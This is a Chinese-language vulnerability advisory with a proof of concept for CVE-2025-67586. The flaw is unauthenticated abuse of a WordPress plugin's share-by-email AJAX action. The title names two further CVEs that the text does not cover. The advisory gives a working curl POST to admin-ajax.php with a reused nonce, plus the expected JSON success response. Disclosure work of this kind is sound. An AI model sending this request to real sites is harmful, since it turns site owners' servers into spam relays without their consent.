(CVE-2025-67586, CVE-2025-67985, CVE-2025-67986) 的漏洞分析
-------------- CVE-2025-67586 漏洞利用 PoC --------------
==> 描述 DLX Plugins 开发的 WordPress 插件中存在一个失效的访问控制漏洞。 该插件暴露了一个无需认证的 AJAX 操作,允许攻击者在没有适当权限检查的情况下滥用 “通过电子邮件分享”功能。
未认证的攻击者可以复用有效的文章 nonce 来触发电子邮件分享请求, 从而在无需用户认证的情况下导致未经授权的电子邮件发送(垃圾邮件/滥用)。
==> 所需权限 无(未认证)
==> 概念验证(PoC)
步骤 1:选择安装了该插件的网站
步骤 2:获取有效的 Nonce
步骤 3:通过未认证请求进行利用
bash 命令:(替换网站 URL、文章 URL 和 nonce)
curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php'
-d 'action=has_email_form_submission'
-d 'formData[postId]='
-d 'formData[permalink]=http://localhost/?p='
-d 'formData[nonce]='
-d 'formData[toEmail]=[email protected]'
-d 'formData[subject]=PoC'
-d 'formData[shareText]=POC test'
-d 'formData[emailShareType]=selection'
--compressed
--> 预期的 JSON 响应:
{ "success": true, "data": { "errors": false, "message_title": "This post has been shared!", "message_body": "You have shared this post with [email protected]", "message_subject": "[Shared Post] ", "message_source_name": "Site Name", "message_source_email": "[email protected]" } }